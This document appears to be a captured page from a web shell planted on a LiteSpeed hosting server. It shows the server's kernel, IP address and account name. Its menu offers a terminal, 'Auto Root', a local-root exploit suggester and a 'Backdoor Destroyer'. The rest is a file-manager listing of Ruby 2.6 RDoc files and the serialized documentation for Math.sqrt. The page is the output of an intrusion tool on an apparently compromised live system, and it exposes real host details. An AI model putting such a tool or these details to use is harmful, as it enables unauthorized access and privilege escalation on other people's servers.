Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
Math /
Delete
Unzip
Name
Size
Permission
Date
Action
DomainError
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
acos-c.ri
506
B
-rw-r--r--
2023-07-26 18:33
acosh-c.ri
506
B
-rw-r--r--
2023-07-26 18:33
asin-c.ri
517
B
-rw-r--r--
2023-07-26 18:33
asinh-c.ri
534
B
-rw-r--r--
2023-07-26 18:33
atan-c.ri
517
B
-rw-r--r--
2023-07-26 18:33
atan2-c.ri
1.4
KB
-rw-r--r--
2023-07-26 18:33
atanh-c.ri
514
B
-rw-r--r--
2023-07-26 18:33
cbrt-c.ri
1.2
KB
-rw-r--r--
2023-07-26 18:33
cdesc-Math.ri
1.35
KB
-rw-r--r--
2023-07-26 18:33
cos-c.ri
559
B
-rw-r--r--
2023-07-26 18:33
cosh-c.ri
525
B
-rw-r--r--
2023-07-26 18:33
erf-c.ri
489
B
-rw-r--r--
2023-07-26 18:33
erfc-c.ri
504
B
-rw-r--r--
2023-07-26 18:33
exp-c.ri
574
B
-rw-r--r--
2023-07-26 18:33
frexp-c.ri
609
B
-rw-r--r--
2023-07-26 18:33
gamma-c.ri
1.71
KB
-rw-r--r--
2023-07-26 18:33
hypot-c.ri
493
B
-rw-r--r--
2023-07-26 18:33
ldexp-c.ri
515
B
-rw-r--r--
2023-07-26 18:33
lgamma-c.ri
655
B
-rw-r--r--
2023-07-26 18:33
log-c.ri
216
B
-rw-r--r--
2023-07-26 18:33
log10-c.ri
583
B
-rw-r--r--
2023-07-26 18:33
log2-c.ri
606
B
-rw-r--r--
2023-07-26 18:33
sin-c.ri
558
B
-rw-r--r--
2023-07-26 18:33
sinh-c.ri
531
B
-rw-r--r--
2023-07-26 18:33
sqrt-c.ri
1.14
KB
-rw-r--r--
2023-07-26 18:33
tan-c.ri
519
B
-rw-r--r--
2023-07-26 18:33
tanh-c.ri
520
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI" sqrt:ETI"Math::sqrt;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"1Returns the non-negative square root of +x+.;To:RDoc::Markup::BlankLine o; ; [I"Domain: [0, INFINITY);T@o; ; [I"Codomain:[0, INFINITY);T@o:RDoc::Markup::Verbatim; [I"0.upto(10) {|x| ;TI", p [x, Math.sqrt(x), Math.sqrt(x)**2] ;TI"} ;TI"#=> [0, 0.0, 0.0] ;TI"# [1, 1.0, 1.0] ;TI"## [2, 1.4142135623731, 2.0] ;TI"$# [3, 1.73205080756888, 3.0] ;TI"# [4, 2.0, 4.0] ;TI"$# [5, 2.23606797749979, 5.0] ;TI"$# [6, 2.44948974278318, 6.0] ;TI"$# [7, 2.64575131106459, 7.0] ;TI"$# [8, 2.82842712474619, 8.0] ;TI"# [9, 3.0, 9.0] ;TI"&# [10, 3.16227766016838, 10.0] ;T:@format0o; ; [I"BNote that the limited precision of floating point arithmetic ;TI"&might lead to surprising results:;T@o;; [I"=Math.sqrt(10**46).to_i #=> 99999999999999991611392 (!) ;T; 0o; ; [I"/See also BigDecimal#sqrt and Integer.sqrt.;T: @fileI"math.c;T:0@omit_headings_from_table_of_contents_below0I"Math.sqrt(x) -> Float ;T0[ I" (p1);T@/FI" Math;TcRDoc::NormalModule00